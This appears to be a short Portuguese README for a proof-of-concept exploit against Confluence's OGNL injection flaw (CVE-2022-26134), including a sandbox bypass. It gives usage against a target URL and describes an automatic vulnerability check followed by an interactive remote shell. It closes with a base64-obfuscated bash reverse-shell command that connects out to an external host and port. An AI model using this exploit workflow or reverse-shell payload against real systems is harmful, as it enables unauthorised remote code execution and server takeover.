
[CVE-2022-26134] RCE por injeção de expressão OGNL no Confluence com bypass de sandbox.
Conjunto de PoC e exploit para RCE por injeção de expressão OGNL (CVE-2022-26134)
Adicionado bypass de sandbox, suporte para versões altas.
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
O script verificará automaticamente se o alvo é vulnerável e entrará em um shell pseudo-interativo se for vulnerável.
Teste no linux:

Teste no windows:

Digite 'q' quando quiser sair.
Os parâmetros de comando são passados diretamente para o método runtime.exec, que não possui o contexto do shell.
então.
No Windows, alguns comandos como dir não podem ser executados diretamente, você pode usar cmd.exe /c dir.
No linux, alguns símbolos especiais não têm efeito. Se precisar executar um comando com símbolos especiais, como um reverse shell, você pode codificá-lo em base64 e depois usar bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}.